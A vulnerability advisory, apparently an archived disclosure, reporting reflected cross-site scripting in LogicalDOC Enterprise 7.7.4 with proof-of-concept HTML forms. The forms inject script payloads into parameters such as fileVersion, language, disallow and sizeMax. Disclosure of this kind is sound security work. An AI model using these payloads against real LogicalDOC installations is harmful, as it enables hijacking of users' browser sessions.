LogicalDOC Enterprise 7.7.4 Reflected Cross Site Scripting

LogicalDOC Enterprise version 7.7.4 suffers from reflected cross site scripting vulnerabilities.

MD5 | 86803762f6ec08d63b2138780616ee41


LogicalDOC Enterprise 7.7.4 Reflected Cross-Site Scripting Vulnerabilities

Vendor: LogicalDOC Srl
Product web page: https://www.logicaldoc.com
Affected version: 7.7.4

Summary: LogicalDOC is a free document management system that is designed
to handle and share documents within an organization. LogicalDOC is a content
repository, with Lucene indexing, Activiti workflow, and a set of automatic
import procedures.

Desc: LogicalDOC suffers from multiple reflected XSS vulnerabilities when input
passed via several parameters to several scripts is not properly sanitized before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.

Tested on: Microsoft Windows 10
Linux Ubuntu 16.04
Java 1.8.0_161
Apache Tomcat/8.5.24
Apache Tomcat/8.5.13
Undisclosed 8.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2018-5449
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5449.php




<script>history.pushState('', '', '/')</script>

<form action="">
<input type="hidden" name="docId" value="3833857" />
<input type="hidden" name="fileVersion" value="251';confirm(1)//" />
<input type="hidden" name="locale" value="en_US';confirm(2)//" />
<input type="submit" value="XSS.1" />

<form action="">
<input type="hidden" name="random" value="1517777865957" />
<input type="hidden" name="language" value="en_US<script>confirm(3)</script>" />
<input type="hidden" name="docLanguage" value="en<script>confirm(4)</script>" />
<input type="hidden" name="baseUrl" value="" />
<input type="hidden" name="sid" value="b0b43ae7-896e-46d6-a4b9-74af03005e3b" />
<input type="hidden" name="folderId" value="4" />
<input type="hidden" name="disallow" value="exe,iso<script>confirm(5)</script>" />
<input type="hidden" name="sizeMax" value="104857600<script>confirm(6)</script>" />
<input type="submit" value="XSS.2" />

<form action="">
<input type="hidden" name="random" value="1517777814854" />
<input type="hidden" name="language" value="en_US<script>confirm(7)</script>" />
<input type="hidden" name="docLanguage" value="en<script>confirm(8)</script>" />
<input type="hidden" name="baseUrl" value="" />
<input type="hidden" name="sid" value="b0b43ae7-896e-46d6-a4b9-74af03005e3b" />
<input type="hidden" name="targetFolderId" value="4" />
<input type="submit" value="XSS.3" />


Related Posts